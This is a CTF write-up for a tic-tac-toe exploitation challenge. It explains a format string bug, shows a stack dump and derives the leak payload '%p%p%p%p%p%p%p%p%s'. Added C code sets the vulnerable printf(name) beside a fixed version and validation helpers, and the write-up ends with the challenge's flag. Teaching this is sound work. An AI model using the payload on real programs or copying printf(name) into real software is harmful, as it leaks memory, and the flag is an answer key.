write-ups-challenges-2024-2025/tic-tac-toes/SOLUTION.md

2024-11-25 21:33:42 +00:00
## Difficulty
50/100 | MEDIUM
A simple format string attack; this is not groundbreaking stuff.
## Category
Exploitation
## How To Solve
There is a format string vulnerability in the `print_win_message` function.
The name the user inputs at the beginning of the game is printed here using
`printf` without any validation. This means we can leak data from the stack.
It also happens that the flag is on the stack.
To leak the flag we are going to use the `%s` format string specifier. The
problem is that there are a couple of values on the stack before that, for
example the stack looks like this right before the `printf` call:
```
00:0000│ rsp 0x7fffffffd250 —▸ 0x5555555596b0 ◂— '%x%x%x%s'
01:0008│-018 0x7fffffffd258 —▸ 0x55555555670b ◂— 'Xx_TicTacToesKing69_xX'
02:0010│-010 0x7fffffffd260 —▸ 0x555555559720 —▸ 0x55555555670b ◂— 'Xx_TicTacToesKing69_xX'
03:0018│-008 0x7fffffffd268 —▸ 0x55555555667f ◂— 'IGCTF{REDACTED}'
04:0020│ rbp 0x7fffffffd270 —▸ 0x7fffffffd2b0 —▸ 0x7fffffffd2e0 —▸ 0x7fffffffd380 —▸ 0x7fffffffd3e0 ◂— ...
05:0028│+008 0x7fffffffd278 —▸ 0x555555555b64 (play_game+240) ◂— mov rax, qword ptr [rbp - 0x18]
06:0030│+010 0x7fffffffd280 —▸ 0x555555559740 —▸ 0x5555555596b0 ◂— '%x%x%x%s'
07:0038│+018 0x7fffffffd288 —▸ 0x555555559720 —▸ 0x55555555670b ◂— 'Xx_TicTacToesKing69_xX'
```
So we need to pop off three 64-bit values before we reach the flag, which suggests
the payload `%p%p%p%s`. This would work on a 32-bit machine, but since this is a
64-bit binary, the first six arguments are passed via registers. This means we need
to "pop off" an additional five arguments (the first argument is the format string
itself, so only five register slots remain), giving the final payload string:
`%p%p%p%p%p%p%p%p%s`
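For comparison, here is the bug pattern from `print_win_message` next to its fixed form, plus two checks a defender might add around the name input. This is an added example written for this write-up, not the challenge's source; the `NAME_MAX` limit, the message text and the helper names are assumptions.

```c
#include <stdio.h>
#include <string.h>

#define NAME_MAX 32   /* assumed limit; the challenge binary's is not known */

/* 'Before': the player's name is the format string, so a name such as
 * "%p%p%p%p%p%p%p%p%s" walks the argument registers and then the stack. */
static void print_win_message_vulnerable(const char *name) {
    printf(name);                        /* -Wformat-security warns here */
    putchar('\n');
}

/* 'After': the format is a compile-time literal and the name is plain data,
 * so any '%' in the name is printed verbatim instead of being interpreted. */
static void print_win_message_safe(const char *name) {
    printf("Congratulations %s, you win!\n", name);
}

/* Counts the printf conversions a string would trigger if misused as a format
 * ("%%" is a literal percent and does not count). Handy for logging or
 * alerting on suspicious names, independent of the literal-format fix. */
int count_format_specifiers(const char *s) {
    int n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;
        while (*p && strchr("-+ #0123456789.*hlLqjzt", *p)) p++;  /* flags/width/length */
        if (*p == '\0') break;           /* dangling '%' at end of string */
        if (strchr("diouxXeEfFgGaAcspn", *p)) n++;
    }
    return n;
}

/* Input policy for the name: non-empty, bounded, printable ASCII, no '%'.
 * Returns 1 if acceptable. Defence in depth only; the real fix is above. */
int validate_player_name(const char *name) {
    size_t len = strlen(name);
    if (len == 0 || len >= NAME_MAX) return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (c == '%' || c < 0x20 || c > 0x7e) return 0;
    }
    return 1;
}

int main(void) {
    const char *name = "Xx_TicTacToesKing69_xX";   /* handle from the write-up */
    if (validate_player_name(name)) print_win_message_safe(name);
    (void)print_win_message_vulnerable;             /* kept for comparison, never called */
    return 0;
}
```

Compiling with `-Wformat-security` (or `-Werror=format-security`) flags the `printf(name)` call at build time, which is the cheapest way to catch this class of bug before it ships.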
## Flag
IGCTF{W3ll_y0u_st1ll_l0st_BuT_at_l3ast_yoU_g0t_th3_fl4g}